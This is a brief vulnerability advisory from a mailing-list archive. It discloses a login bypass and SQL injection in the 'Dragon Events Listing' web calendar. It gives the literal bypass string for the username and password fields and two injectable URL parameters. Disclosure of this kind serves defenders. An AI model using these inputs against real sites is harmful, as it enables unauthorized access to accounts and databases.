Dragon calendar [ login bypass & injection sql ]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

vendor site:http://www.dragoninternet.net/
product:Dragon Events Listing
bug:login bypass & injection sql
risk:high


login bypass :
username: 'or''='
passwd: 'or''='

injection sql (get)
http://site.com/event_searchdetail.asp?ID='[sql]
http://site.com/venue_detail.asp?VenueID='[sql]




laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@xxxxxxxxx
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux